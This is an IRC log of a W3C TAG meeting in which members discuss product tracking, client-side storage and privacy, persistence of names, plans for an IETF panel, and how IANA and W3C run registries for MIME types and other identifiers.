[URI] 14:24:28 [timbl] nm: Tracker is just not flexible enough to be able to connect issues and products 14:24:33 [ht] NM: Please note that there are two 'Product' pages, one under 2001/tag/products and one under Tracker 14:24:52 [ht] [Discussion about mechanism, not minuted] 14:26:10 [timbl] nm: Need properties fo a product: Goals, scuuess criteria, deliverables with dates, schedules, TAG members assigned, related issues. 
14:26:33 [ht] NM: Intent is to have a small number of Products 14:26:39 [Norm] Norm has joined #tagmem 14:26:54 [timbl] We could do it in RTDF if we had a RDF export from Tracker of course 14:27:11 [ht] NM: API Minimization is our first example: 14:28:03 [Norm] Norm has joined #tagmem 14:28:05 [ht] NM: Goals and Success criteria are the core of these 14:28:37 [ht] ... Made concrete by deliverables 14:30:07 [ht] NM: Example Action: ACTION-514 14:30:15 [ht] tracker, ACTION-514 14:30:24 [ht] trackbot, ACTION-514 14:30:24 [trackbot] Sorry, ht, I don't understand 'trackbot, ACTION-514'. Please refer to for help 14:30:51 [ht] LM: I think maybe we need two categories of Products 14:31:08 [ht] ... 1) Specific documents or other outputs' 14:31:09 [timbl] q+ 14:31:12 [ht] s/'/;/ 14:31:47 [ht] LM: 2) Things which are more like some of our Issues, e.g. Track the HTML work 14:32:02 [ht] NM: Yes, but can we just try your case (1) for now 14:33:21 [ht] TBL: Mechanisms are your business as chair, the focus is on the content, that's where our energy should go 14:34:17 [ht] TBL: But, having said that, my inner hacker has already built an ontology for issue/product/... management for the Tabulator 14:34:33 [ht] ... I could do more hacking and give you everything you want 14:34:47 [ht] TBL: In practice lets go ahead as you propose 14:35:12 [ht] ... But in the background, maybe you and I should try to do something better 14:35:23 [ht] Tutti: Crack on 14:36:09 [masinter] q+ 14:36:10 [ht] NM: Regardless of mechanism, do we agree to focus our effort management on setting goals and success criteria, with dated deliverables 14:36:32 [ht] q+ to cavill wrt education/oversight kinds of activities 14:36:38 [ht] ack masinter 14:36:45 [jar] jar has joined #tagmem 14:36:56 [jar] It would be nice if (1) product name could be changed (2) products can be classified somehow (active, complete, etc) (3) notes could be added to product pages 14:37:18 [ht] LM: We do other things -- coordination with the IETF 14:37:26 [masinter] want to track the larger theme of W3C/IETF coordination at architectural level 14:37:26 [ht] LM: This is a larger theme 14:37:59 [ht] NM: For me that's an Issue, about how to coordinate with other bodies 14:38:25 [ht] LM: It's not a management issue, it's a technical issue -- what is the relationship of Web Arch to Internet Arch 14:38:54 [ht] LM: What's critical for a Product is Success criteria 14:39:47 [ht] ... And I think we _can_ identify and evaluate progress for this effort, so it can be a Product 14:40:18 [masinter] q- 14:40:22 [ht] NM: Other things can have ways to identify and evaluate progress, I want to keep Products for things with deliverables 14:40:44 [ht] ack DKA 14:40:44 [Zakim] DKA, you wanted to suggest we take a look at w3c priorities : 14:40:47 [noah] q? 14:41:10 [timbl] q- 14:41:13 [timbl] <-- the high-level concept of task 14:41:27 [ht] DKA: Wrt TAG priorities, there's also the W3C 2011 Priorities and Milestones document 14:41:57 [ht] DKA: 14:42:22 [ht] NM: This reminds me that there are two ways to come at our planning: internally-driven and externally-driven 14:42:38 [ht] DKA: In particular, are we missing anything from Jeff Jaffe's list? 14:42:57 [ht] NM: So take a tentative pass at what we are already spending time on 14:43:08 [ht] ... and then see if there's anything we're missing 14:43:29 [ht] ... at which point we will know if we're overcommitted 14:44:15 [ht] LM: It's great to see a W3C priority list of technical topics 14:44:22 [ht] ... 
I'd like to respond to it 14:44:47 [ht] ... So this is higher priority for me than reviewing our current / past efforts 14:46:02 [ht] HST: The chair is asking for help in getting to that, by first clarifying the status of our existing commitments 14:46:31 [ht] q- ht 14:46:35 [masinter] q? 14:46:54 [ht] NM: Here's another Product: HTML/XML Unification 14:47:38 [ht]??? 14:48:43 [masinter] I think the "big theme" here is: architectural coherence of the W3C protocol and format work 14:48:45 [ht] TBL: Wrt Success criteria, include documentation of important properties of the system which need to be preserved 14:49:14 [masinter] And that XML / HTML is a lead element, because so much of W3C work is based on XML and yet HTML consistency with it is at issue 14:49:32 [masinter] and that the TAG could look at whatever the "task force" produces in this context 14:49:53 [masinter] the goal should not be "Unification" but "coherence" and "support for workflows and use cases" 14:50:33 [masinter] and there are various sub-products, around IRIs and URI schemes.... 14:50:46 [noah] ACTION: Noah to build Tracker product page for HTML/XML Unification 14:50:47 [trackbot] Created ACTION-522 - Build Tracker product page for HTML/XML Unification [on Noah Mendelsohn - due 2011-02-17]. 14:51:04 [ht] LM: The big theme here is architectural coherence between W3C RECs 14:51:53 [ht] LM: I wouldn't want to track this as Unification, because that's not the goal even for XML vs. HTML 14:52:02 [ht] ... I don't think that goal stands up 14:52:37 [ht] NM: I hear you as observing that there's a higher theme that this specific Product fits into 14:52:57 [ht] and I think we can do that, we can have Themes 14:53:06 [ht] s/and/NM: and/ 14:53:38 [ht] NM: The name comes from the history -- is the key point the abstraction of a higher level 14:53:55 [ht] LM: Either this fits in one of the high-level things the JJ laid out, or something else 14:54:11 [ht] ... in this case, something else, which is a particular TAG responsibility 14:54:59 [ht] NM: I hear this, and will try to find a way to organise our thinking at this level 14:55:08 [ht] LM: Pass for now 14:58:51 [ht] HST: [proposed minor agenda restructuring] 14:59:21 [ht] Topic: Client-side Storage 14:59:34 [ht] ISSUE-60 14:59:42 [ht] trackbot, ISSUE-60 14:59:42 [trackbot] Sorry, ht, I don't understand 'trackbot, ISSUE-60'. Please refer to for help 14:59:49 [ht] trackbot, ISSUE 60 14:59:49 [trackbot] Sorry, ht, I don't understand 'trackbot, ISSUE 60'. Please refer to for help 15:00:24 [ht] AM: speaks to 15:00:26 [masinter] masinter has joined #tagmem 15:00:47 [ht] AM: I need guidance on how to take this forward 15:02:29 [masinter] This underlying architectural issue relates to "Powerful Web Apps", "Data and Service Integration" and "Web of Trust": web applications are more powerful if different applications can share. But they have to do it in a secure way that also maintains user privacy. 15:03:07 [ht] AM: The fundamental issue is how to manage the inevitable intrusion of the Privacy/Security issue into any discussion of client-side storage: 15:03:11 [timbl] q+ 15:03:27 [ht] AM: 1) Ignore it, and just do the storage thing; 15:03:44 [ht] AM: 2) Try to do the integration. 15:03:47 [noah] q? 15:03:47 [jar] q? 15:03:47 [masinter] topic? 
15:04:41 [ht] AM: The answer is different depending on whether we see the deliverable here as stand-alone, or as part of a larger document where Security is being taken care of 15:04:57 [timbl] q+ to point out that there is now a large and increasing amount of technology making cookies the tip of the iceberg, and that the issue of which websites can acecss what cookies generalzies to which websites, pcrincipals, and code modules, 15:05:00 [noah] ack next 15:05:01 [Zakim] timbl, you wanted to point out that there is now a large and increasing amount of technology making cookies the tip of the iceberg, and that the issue of which websites can acecss 15:05:06 [Zakim] ... what cookies generalzies to which websites, pcrincipals, and code modules, 15:05:24 [jar] q+ jar to mumble about multiple requirements -> solution with multiple facets 15:05:53 [ht] TBL: The document talks mostly about cookies, but there are a large number of new technologies, e.g. sqllib, which are at least as important going forward 15:06:13 [masinter] Security sections could move to 15:06:29 [ht] TBL: And as you talk about privacy in that context, it becomes a question about what 'agent' (software, site, person) can get access to what 15:06:56 [ht] AM: You're going beyond data 15:07:04 [masinter] based on 15:07:53 [masinter] q? 15:07:55 [masinter] q+ 15:08:03 [ht] TBL: No, just data raises these issues, say I have an rdf store on my phone, and an app written by an airline is running in a container from a third party and wants access to that data. . . 15:08:21 [noah] q+ to briefly respond to Tim 15:08:37 [ht] ... At worst we end up all having to have our own copies of all the privacy-implicated software, to ensure our data doesn't get away 15:08:57 [noah] ack next 15:08:58 [Zakim] jar, you wanted to mumble about multiple requirements -> solution with multiple facets 15:09:15 [ht] TBL: So this discussion has to be forward-looking to address not just what's here now, but what's coming soon 15:09:55 [masinter] "In 2011, W3C expects to charter a Web Application Security Working Group for work on specific technologies to enable more robust and secure Web Applications." from 15:10:01 [ht] JAR: Normal engineering practice should be followed, to look first at the requirements, without jumping to soon to the technology (e.g. cookies) 15:10:24 [ht] ... You started out with "need....", which are requirements, and then jump to security -- but that's a requirement too 15:11:05 [ht] JAR: It's like building a LISP interpreter, if you leave memory management to the end, you end up with a buggy implementation 15:11:08 [masinter] q? 15:11:17 [ht] AM: Right, so you're saying add security as a requirement, early 15:11:31 [ht] JAR: Only then do you look at solutions 15:11:40 [noah] ack next 15:11:48 [ht] ... and try to match requirements to aspects of solutions 15:12:10 [masinter] under "Privacy and Security" 15:12:43 [ht] LM: There is a commitment at W3C level to charter a Privacy and Security Wg 15:12:50 [noah] Actually, the slide just said privacy, and I think that's what I heard him ask about. That's why I got confused when we kept talking about security. 15:13:15 [ht] LM: And that group is a candidate recipient for this work 15:13:32 [ht] AM: I thought it was a Privacy IG that was on the way 15:13:40 [ht] ... and that's not quite the same 15:14:41 [ht] LM: W3C has commited to chartering an Web Applications Security WG 15:15:04 [ht] ... 
In JJ's document 15:15:22 [ht] s/an Web/a Web/ 15:15:29 [noah] From: 15:15:48 [noah] In 2011, W3C expects to charter a Web Application Security Working Group for work on specific technologies to enable more robust and secure Web Applications. 15:15:53 [noah] (public document) 15:15:54 [noah] q? 15:15:57 [noah] ack next 15:15:59 [Zakim] noah, you wanted to briefly respond to Tim 15:16:04 [ht] AM: So, yes, when that happens, feeding in to it makes sense 15:16:43 [ht] NM: On the separate vs. together point (storage vs. Privacy&Security) 15:16:54 [ht] ... indeed per JAR sometimes it's dangerous to factor 15:17:01 [ht] ... but not sure that's true here 15:17:28 [ht] NM: Suppose you did just focus on storage, w/o talking about P&S 15:17:36 [masinter] "Client side state" doesn't really have anything to say unless there is some 'memory' or 'communication' of client side state 15:18:01 [ht] NM: What would the Product page look like if you did that (thought experiment)? 15:18:19 [ht] ... If you can't even do that, we've learned something 15:18:54 [ht] ... And if you _can_, then we can look at the P&S factoring question as such 15:19:15 [masinter] q+ to explore a different perspective -- there are multiple design patterns in use in the community, some are better than others for several reasons... which are better, how are they evaluated, and what are 'best practices' 15:19:27 [ht] NM: Thinking about the Product page should be really helpful 15:19:41 [ht] AM: I want to come back to the "one large document" question 15:19:50 [ht] JAR: That's not what I said. . . 15:20:06 [ht] NM: If we want to do a large document, it's a long way out 15:20:32 [ht] ... So even if we are aiming for a merged form, the work has to go ahead as if it were going to stand on its own 15:21:01 [ht] LM: Different perspective -- we're not designing an implementation -- there are already a number of iimplemenrtations, and they differ 15:21:10 [noah] q? 15:21:12 [noah] ack next 15:21:13 [Zakim] masinter, you wanted to explore a different perspective -- there are multiple design patterns in use in the community, some are better than others for several reasons... which are 15:21:15 [Zakim] ... better, how are they evaluated, and what are 'best practices' 15:21:19 [ht] ... they have different relevant properties to the requirements 15:21:23 [noah] q+ to ask: what are the top 3 questions this finding will answer? 15:21:52 [ht] LM: Here are seven different impls, here are their properties, here's why some address req't X, Y, Z better/worse than others 15:22:04 [ht] s/impls,/design patterns/ 15:22:32 [masinter] "seven" plus or minus four 15:22:36 [ht] s/iimplemenrtations/design patterns for C-S S/ 15:23:11 [ht] NM: Assuming this is a separate document, what are the top three questions it will answer for the community? 15:23:17 [ht] AM: Give me three weeks 15:23:42 [ht] NM: OK, let's suspend judgement on the long-term future of this work until we see your response 15:24:30 [masinter] are there books or papers on web application design, that cover client side storage, use of cookies, local storage, etc? 15:24:30 [noah] . ACTION: Ashok (with help from Noah) build product page for client storage finding, identifying top questions to be answered 15:24:33 [ht] AM: We asked the WebApps guys who are writing these specs, where are your use cases? 
15:24:44 [ht] AM: And they didn't have much of a concrete reply 15:25:18 [ht] [Scribe note: This was all re ] 15:26:26 [noah] ACTION: Ashok (with help from Noah) build good product page for client storage finding, identifying top questions to be answered on client side storage Due: 2011-03-01 15:26:26 [trackbot] Created ACTION-523 - (with help from Noah) build good product page for client storage finding, identifying top questions to be answered on client side storage Due: 2011-03-01 [on Ashok Malhotra - due 2011-02-17]. 15:27:29 [ht] [Break until 1045] 15:27:50 [Ashok] Ashok has joined #tagmem 15:28:08 [Ashok] rrsagent, pointer 15:28:08 [RRSAgent] See 15:28:32 [Ashok] rrsagent, make logs member visible 15:49:11 [ht] [resume from break] 15:50:03 [ht] Topic: Review of TAG activity 15:52:51 [ht] NM: I've been reviewing the open actions, to try to abstract what the set of Products are in principle 15:53:01 [ht] ... So that we can create the ones that are missing 15:53:54 [ht] NM: Quick scan of the Tracker Products: 2001/tag/group/track/products 15:55:40 [ht] NM: Agreed that we are _not_ currently working on the Versioning Product 15:55:41 [noah] ACTION: Noah close versioning product 15:55:41 [trackbot] Created ACTION-524 - Close versioning product [on Noah Mendelsohn - due 2011-02-17]. 15:56:14 [ht] LM: Some of that work is going forward under other headings, e.g. the mime info work 15:57:21 [ht] NM: What is this WebApp Access Control product? 15:57:25 [noah] ACTION: Noah to check with John before closing WebApps access control 15:57:25 [trackbot] Created ACTION-525 - Check with John before closing WebApps access control [on Noah Mendelsohn - due 2011-02-17]. 15:57:26 [ht] JR: Ask JK 15:58:49 [noah] ACTION: Noah to do first draft product stuff for MIME and related core web mechanisms 15:58:49 [trackbot] Created ACTION-526 - Do first draft product stuff for MIME and related core web mechanisms [on Noah Mendelsohn - due 2011-02-17]. 16:06:57 [ht] NM: We have a total of 45 open actions 16:10:49 [ht] LM: I want to push Action 519 to be even bigger, on the relation of standards to operational requirements 16:11:14 [ht] ... Big ISPs come to IETF, not to W3C, so this is important wrt our presentation to the IAB 16:12:42 [noah] ACTION: Noah to make sure we make progress on ACTION-519 and ACTION-517 in time to provide input to Prague IETF meeting, talk to be ready by mid-March 16:12:42 [trackbot] Created ACTION-527 - Make sure we make progress on ACTION-519 and ACTION-517 in time to provide input to Prague IETF meeting, talk to be ready by mid-March [on Noah Mendelsohn - due 2011-02-17]. 16:18:37 [ht] NM: Diving in to Action-521, do we want to press forward with taking Disposition of Names in a Namespace to REC: 4 not sure, 2 against, 1 to push it to Core, 0 to do it 16:19:02 [ht] NM: Remind NM to propose next steps and/or discussion on this 16:19:24 [masinter] masinter has joined #tagmem 16:20:08 [ht] NM: Relieved not to find too many "Oops, we've let this slip" responses or "Oops, there's a big iceberg under here" 16:21:41 [ht] NM: Open for discussion, let's propose edits to the list of Products 16:21:52 [ht] ... Additions or deletions 16:22:11 [ht] q+ to say Products don't exhaust our work 16:22:16 [jar] q+ jar to take apart 'important' 16:22:39 [noah] q_ 16:22:40 [noah] q- 16:22:42 [noah] ack next 16:22:43 [Zakim] ht, you wanted to say Products don't exhaust our work 16:22:51 [noah] ack next 16:22:51 [masinter] q+ to propose changing "HTML 5 review" to "HTML/CSS/etc. 
architecture" 16:22:52 [Zakim] jar, you wanted to take apart 'important' 16:22:59 [noah] ack next 16:23:00 [Zakim] masinter, you wanted to propose changing "HTML 5 review" to "HTML/CSS/etc. architecture" 16:23:39 [ht] LM: Change HTML 5 review to Open Web Platform Architecture 16:25:04 [ht] LM: At the AC, the MS rep [name?] proposed a number of HTML5-related arch. issues 16:25:26 [ht] ... and I've gotten a list from Julian Reschke 16:25:38 [masinter] and from several other people 16:25:42 [noah] q? 16:25:59 [masinter] s/the AC/the TPAC plenary/ 16:27:11 [ht] HST: Is Persistence a Product 16:27:47 [ht] NM: Should we be doing that -- think about where this stands? 16:27:49 [DKA] q+ to suggest a serious thing. 16:28:01 [masinter] I'm looking at 16:28:22 [ht] LM: I don't think it has a real place wrt fundamental arch. issues 16:28:25 [noah] q? 16:28:49 [masinter] s/has a real place/is one of the top priorities/ 16:29:01 [ht] TBL: We have responsible for long-term issues, which no-one else will worry about 16:29:07 [ht] s/have/are/ 16:29:59 [ht] s/wrt fundamental arch. issues/aligns with the guidance we're getting/ 16:30:30 [ht] NM: I read JJ's list as a "be sure to cover this", not "and nothing else" 16:30:49 [timbl] q+ to to say we can also contribute to Jeff's list 16:32:28 [ht] HST: We owe it to the people who raised the persistence question to work on it, and I think addressing why people don't trust 'http:' URIs is a fundamental arch. question. 16:32:43 [ht] NM: Goals and success criteria 16:33:30 [noah] HT: We have two draft documents in different stages: 1) my somewhat stale but valuable Dirk and Nadia design a naming scheme and 2) Jonathan's checklist document 16:33:52 [noah] HT: I think each of those speak to a different community, and suggest different deliverables directed at different goals. 16:34:10 [masinter] the reason why i'm reluctant to put this is a priority is that i'm afraid i have some real disagreements about the nature of the problem and the directions to address them. 16:34:15 [noah] HT: Potential goal #1: address the architectural origins of the vulnerability of Web names as 16:34:58 [plinss] s/names as/names./ 16:35:03 [noah] HT: Potential goal #2: identify best practices for the use of Web names in contexts where some form of persistence is goal. 16:36:31 [timbl] q+ to wonder about a goal in which social insititions are changed in order to acheive persistence. 16:37:07 [noah] ack next 16:37:09 [Zakim] DKA, you wanted to suggest a serious thing. 16:37:56 [noah] ACTION: Henry to create and get consensus on a product page and tracker product page for persistence of names Due: 2011-03-01 16:37:56 [trackbot] Created ACTION-528 - Create and get consensus on a product page and tracker product page for persistence of names Due: 2011-03-01 [on Henry S. Thompson - due 2011-02-17]. 16:38:12 [timbl] due date: 3011-01-01 -- test that the action URI still works 16:38:12 [noah] ACTION-528 Due 2011-03-01 16:38:12 [trackbot] ACTION-528 Create and get consensus on a product page and tracker product page for persistence of names Due: 2011-03-01 due date now 2011-03-01 16:38:37 [DKA] ack me 16:39:07 [masinter] "persistence" requires both technical and social institutions to coordinate. We should look at successful social institutions and those in trouble. 16:39:20 [ht] DKA: Offline web: widgets, app cache, cf. 
JJ's Web Apps and mobile devices bullet 16:39:38 [masinter] 16:39:57 [ht] DKA: There is a workshop being organized by Matt Womer in this area 16:40:09 [ht] NM: This overlaps with C-S S 16:40:20 [ht] DKA: This is about packaging 16:40:34 [ht] ... not (just) storage 16:40:53 [ht] NM: Should we discuss making this a product? 16:40:58 [ht] NM: OK, will do 16:42:02 [noah] ACTION: Noah to schedule telcon discussion of a potential TAG product relating to offline applications and packaged Web 16:42:02 [trackbot] Created ACTION-529 - Schedule telcon discussion of a potential TAG product relating to offline applications and packaged Web [on Noah Mendelsohn - due 2011-02-17]. 16:42:04 [ht] NM: All of mobile? 16:42:17 [ht] DKA: No, mobile and the offline web -- packaging the web 16:43:01 [Ashok] Interacts with Client-Side Storage 16:43:43 [ht] JAR: Saying something is important is not very useful, unless someone is signed up for it 16:44:46 [ht] ... Maybe we should do a gap analysis: a matrix where we have supply-side -- what would each member be inclined to do, left to themselves, vs. demand-side: what have JJ and/or our community asked us to do 16:44:55 [ht] ... and we look for the blank spaces 16:45:08 [masinter] q+ to talk about 'underlying architecture' as possibly a higher TAG priority than Jeff's list, which applies to W3C as a whole 16:45:11 [ht] JAR: And we don't yet have enough information yet to actually build that matrix 16:45:33 [ht] NM: That's a goal for us, yes 16:46:00 [masinter] alignment between W3C working groups, and with IETF and with previous specs and .... is after all what TAG was originally chartered for 16:46:05 [ht] zakim, close the queue 16:46:05 [Zakim] ok, ht, the speaker queue is closed 16:46:19 [masinter] q? 16:46:24 [masinter] ack masinter 16:46:24 [Zakim] masinter, you wanted to talk about 'underlying architecture' as possibly a higher TAG priority than Jeff's list, which applies to W3C as a whole 16:46:24 [ht] q- to 16:46:45 [noah] ack next 16:46:47 [Zakim] timbl, you wanted to wonder about a goal in which social insititions are changed in order to acheive persistence. 16:47:18 [noah] topic: IETF Meeting in Prague 16:47:24 [noah] Henry and Larry will be there. 16:47:27 [noah] AM: Talk or panel. 16:47:48 [noah] LM: See ACTION-500. There is a panel, with representation from lots of the IETF community. Panel description is copied in the action. 16:47:57 [ht] trackbot, action-500 16:47:57 [trackbot] Sorry, ht, I don't understand 'trackbot, action-500'. Please refer to for help 16:48:00 [ht] trackbot, action-500? 16:48:00 [trackbot] Sorry, ht, I don't understand 'trackbot, action-500?'. Please refer to for help 16:48:02 [noah] LM: Not yet determined between Henry and me who will actually be on the panel. 16:48:08 [noah] ACTION-500? 16:48:08 [trackbot] ACTION-500 -- Larry Masinter to coordinate about TAG participation in IETF/IAB panel at March 2011 IETF -- due 2011-02-15 -- OPEN 16:48:08 [trackbot] 16:48:22 [noah] AM: You probably only get 15 mins? 16:48:27 [noah] LM: At most, could be 10. 16:48:44 [noah] LM: We should use this mainly to "show the flag", indicate where major points of interest are, etc. 16:48:58 [noah] LM: They've written what they think the issue is for them. 16:49:20 [noah] HT: It's in some sense better we don't have a longer slot, which would lead to us reading our laundry list. 16:49:41 [noah] HT: The appropriate question we need to think of here today is, what do we want to project about the TAG itself? 16:49:50 [noah] q+ to ask about TAG vs. 
W3C
16:49:56 [noah] zakim, open the queue
16:49:56 [Zakim] ok, noah, the speaker queue is open
16:49:58 [noah] q+ to ask about TAG vs. W3C
16:50:39 [noah] LM: We are in the process of establishing our priorities based on what the community needs from us. Some people at the IETF meeting are likely to be, unfortunately, not W3C members.
16:51:37 [noah] NM: Um, our TAG community is the Web and Internet community, not just the W3C.
16:51:44 [noah] LM: Ooops, you're right, that's what I meant.
16:52:06 [noah] NM: We listen to everyone, on www-tag, by inviting people to join meetings and calls, etc.
16:52:24 [noah] HT: The IETF is appealingly a crypto-anarchist community with a long history.
16:52:49 [noah] HT: They are phenomenally successful.
16:54:49 [noah] HT: Larry and I should probably send email to www-tag asking for input, then get telcon time.
16:55:02 [noah] LM: Henry, how's about you draft a talk for review, with my help?
16:55:16 [noah] HT: I'll produce, say, 5 slides, for review on call in two weeks.
16:55:22 [masinter] what is the tag, what the tag works on, what things are we thinking about in W3C, what things are we thinking about in the TAG in particular
16:56:03 [noah] ACTION: Henry to draft slides for IETF meeting, with help from Larry Due 2011-02-22
16:56:03 [trackbot] Created ACTION-530 - Draft slides for IETF meeting, with help from Larry Due 2011-02-22 [on Henry S. Thompson - due 2011-02-17].
16:56:39 [ht] NM: Suspended for lunch
16:56:54 [ht] rrsagent, make logs public-visible
16:57:00 [ht] rrsagent, draft minutes
16:57:00 [RRSAgent] I have made the request to generate ht
17:09:35 [timbl] timbl has joined #tagmem
17:36:47 [ht] ht has joined #tagmem
17:41:35 [timbl_] timbl_ has joined #tagmem
18:04:14 [timbl] scribenick: timbl
18:04:19 [timbl] q?
18:04:46 [timbl] Philippe Le Hégaret joins the meeting
18:05:09 [timbl] Discussion of action items
18:05:35 [timbl] NM: Larry asked me to add a link to RFC5226 to the agenda.
18:06:00 [noah]
18:06:21 [plh] plh has joined #tagmem
18:06:39 [noah]
18:06:40 [timbl] DKA: I note IE9 has Geolocation.
18:06:41 [masinter] there was another link
18:06:56 [timbl] Larry:
18:06:59 [timbl] re ACTION-511
18:07:10 [timbl] ... we have had a lot of discussion of registries
18:07:22 [timbl] .. perhaps as reaction to IANA, feeling that registries were
18:07:36 [timbl] ... a bottleneck in the system, that we should use URIs to be decentralized.
18:07:53 [noah] BTW: I can't see the queue when I'm projecting, so for now we won't use it.
18:07:54 [timbl] ... Still, there are protocols, protocol and language elements where we don't use URIs.
18:08:13 [timbl] ... But, if it isn't a URI, then how do you find out what it means?
18:08:26 [plh] --> XPointer Registry
18:08:43 [timbl] ... Does IANA still manage it? But IANA is unresponsive and cumbersome? Should we use a wiki page, [html wg suggests]
18:09:06 [timbl] ... I was trying to frame the issue with MIME type registries.
18:09:13 [plh] --> Register an Internet Media Type for a W3C Spec
18:09:23 [timbl] ... Many issues are around what the mime type means when it evolves, having to do with versioning.
18:09:54 [timbl] .... There are technical and social issues. Power: who controls the registry? Who controls what properties things should have registered?
18:10:07 [timbl] ... People disagree on the contents of the registry
18:10:39 [timbl] ... I pointed to RFC2434, now RFC5226.
18:10:40 [timbl] .
18:10:41 [masinter]
18:11:08 [timbl] ...
I also saw a goid IANA document in progress on extensibility from the point of view of protocol design, in which registries are one way.
18:11:17 [timbl] s/oid/ood/
18:11:31 [timbl] PLH: I pasted in various links, including to the XPointer registry.
18:11:44 [timbl] ... This registry is hosted by W3C.
18:12:22 [masinter] css prefix organization names?
18:12:34 [timbl] HT: The spec didn't have unqualified names, but people complained that getting URIs in to bind every name was ridiculous. Please let us define some short names which we can own, and we did, and so we have a URI-based registry mechanism.
18:12:51 [plh]
18:12:56 [timbl] .... the way you tell what short names mean or are available is you concatenate with a URI.
18:13:14 [timbl] PLH: This was very lightweight, a lightweight review process too.
18:13:29 [timbl] ... We demand a link to a spec but no other review.
18:13:50 [timbl] HT: Just a way of mapping short names into URI space on a first come, first served basis.
18:14:10 [timbl] LM: What does CSS do with vendor prefixes?
18:14:26 [timbl] Peter: Nothing formal -- we have recently started keeping a list.
18:14:54 [noah] NM: Is it just a convention?
18:15:06 [timbl] ... You register just the -moz- not the -moz-* names.
18:15:27 [noah] PL: No, more than that. The spec requires a syntactic convention for use of anything that is either not in the spec, or not advanced to a certain point in the spec development.
18:15:53 [noah] TBL: Do you standardize things like -*-roundedcorner?
18:15:57 [noah] PL: No, just -*-
18:16:29 [timbl] TBL: As a CSS user, having many diff names was a pain for Rounded Corners.
18:16:42 [timbl] Peter: That was necessary as the diff vendors did it differently.
18:17:13 [timbl] Larry: We were having registries, so we are not really following our URI architecture. Can IANA be fixed? Is the problem IANA?
18:17:26 [timbl] ... People say the problem is not IANA but tracking what IANA is up to.
18:17:27 [plh] --> HTML ISSUE 27
18:17:47 [timbl] TBL: For example, the text/n3 mime type is still pending
18:17:51 [timbl] ... after years
18:18:24 [timbl] Larry: if you look at the docs establishing how IANA works, they don't determienthe process ... that is established anew for each registry.
18:18:52 [timbl] I refined the URI scheme registry process, there is still unhappiness with it.
18:19:07 [timbl] ... I would hope for W3C to reinvent this wheel and rediscover all the problems
18:19:19 [noah] s/hope for/hate for/
18:19:29 [timbl] PLH: This is related to infmaous HTML WG Issue 27 (see link above)
18:19:39 [timbl] ... (all HTML WG issues are infamous)
18:19:45 [noah] s/infmaous/infamous/
18:20:17 [masinter] proposal W3C run rel:
18:20:20 [noah] s/determienthe/determine the/
18:20:25 [timbl] PLH: One proposal is to have a registry at W3C
18:20:50 [masinter]
18:21:32 [timbl] ... Mark Nottingham has done work on an IANA registry. Ian Hickson tested it and declared that it was not working.
18:21:45 [timbl] ... there is a counterproposal which just uses a wiki page.
18:21:55 [timbl] ... This was escalated to the WG as issue 27.
18:22:17 [noah]
18:22:26 [noah] ISSUE 27: @rel value ownership, registry consideration
18:22:38 [timbl] Larry: We should discuss whether and why and how W3C runs registries -- it should not be decided just by a local WG, as it is a long term commitment, and much more than the design of a technical spec.
18:23:02 [timbl] PLH: Without requirements, you can't
18:23:12 [masinter] image/svg+xml
18:23:19 [timbl] PLH: It took years to get image/svg+xml registered.
18:23:28 [timbl] ... Even though it was in use for years.
18:23:41 [plh] --> Approval of image/svg+xml Media Type
18:24:15 [plh] q?
18:24:26 [noah] q-
18:24:30 [timbl] Larry: People brought this up as a poster child for why it didn't work ... but they didn't in fact respond to IANA's comments about what was missing from the application
18:24:34 [timbl] q+
18:24:46 [noah] ack next
18:25:21 [masinter] there's also been a long recent discussion about +json and +zip; and +xml is an issue
18:25:33 [noah] TBL: We had a story with text/n3+rdf type where we used the W3C/IETF liaison meeting to track. Per that discussion we removed the +rdf.
18:25:59 [noah] TBL: They said we would have to produce a stable document, which we did some years ago, so for me text/n3 is another poster child for the problems.
18:26:18 [plh] --> N3
18:26:48 [noah] TBL: The confusion is compounded because there are people out there using the now deprecated +rdf form, but there's nothing to point to saying, "here's what you should do".
18:26:53 [jar] q+ jar to mention journals e.g. PLoS One
18:27:10 [masinter] Maybe W3C should have an IANA shepherd who knows how to work IANA and helps people through the process, that would be better than running a W3C registry.
18:27:18 [plh] for n3, I'm probably the bottleneck
18:27:27 [noah] TBL: There's also no tracker for the application review process for mime types. You can't tell where things are in the process, what the problems are, or even that there is a registration pending.
18:27:49 [noah] TBL: So, one suggestion is that we should not only run a registry at W3C, but that we should run a tracker.
18:27:56 [noah] LM: You could run a tracker for IANA
18:28:23 [timbl] LM: The IETF tools team has been building tools for IANA but not that one yet.
18:28:30 [noah] LM: The IETF tools team has built tools for many groups, and perhaps has just not gotten to IANA
18:28:46 [timbl] PLH: The technical issues we have to resolve, and they can take years
18:29:14 [timbl] ... The charset attribute, and then content-encoding; the discussions exhausted the energy of the applicants.
18:29:15 [timbl] q+
18:29:50 [timbl] Larry: My experience has been very positive: you tell the truth, you get approval. With text/html Dan Connolly and I updated it... I also did application/pdf.
18:29:55 [plh] q+
18:30:37 [timbl] ... I was involved in gopher's mime types
18:31:25 [timbl] ... What can take years has been miscommunication.
18:32:32 [plh] --> MIME Type Review Request: image/svg+xml November 2044
18:32:33 [noah] TBL: I sympathize.
18:32:37 [plh] s/2044/2004/
18:32:46 [noah] TBL: That now is the case, which is good.
18:33:21 [noah] TBL: Therefore, my view is that the right path for SVG would have been that all the stuff like charset should have been caught and fixed as part of the W3C CR process reviews.
18:33:29 [plh] q?
18:33:34 [noah] ack next
18:33:35 [Zakim] jar, you wanted to mention journals e.g. PLoS One
18:33:36 [timbl] q-
18:33:53 [timbl] jar: This is not happening in a vacuum -- there ahve been ergistries before IANA
18:34:06 [timbl] ... It isn't jsyt who runs it, it is wjhat properties it has:
18:34:10 [noah] s/ahve/have/
18:34:21 [noah] s/ergistries/registries/
18:34:39 [timbl] ... What criteria for acceptance, professionalism of management, what tracking, etc. ...
the publication of a scholarly journal is an analogous process, for example.
18:35:49 [plh] s/jsyt/just/
18:35:56 [plh] s/wjhat/what/
18:36:26 [timbl] Larry: We use registries for extensibility, where the spec points to a given specific registry, and the standard defines the criteria for the registry, so that the standard will still work. If someone tries to register a term which violates the design, then it is rejected.
18:37:21 [masinter] maybe this is an important criterion for registries -- that the protocol design shouldn't rely on the registrar review to maintain invariants
18:38:18 [ht] q+ to ask what _is_ the problem at hand
18:38:59 [timbl] Tim: Example -- HTTP headers, as RFC822 headers, always allow a comma as an equivalent to a new header line - the cookie header spec in error used it differently and it was not caught.
18:39:27 [timbl] Larry: The spec puts an onus on the good people running the registry to make sure that good things happen.
18:39:51 [noah] LM: In some cases in the past, the spec did not tightly bound what extensions could do, and we relied on the registrar to enforce good practice.
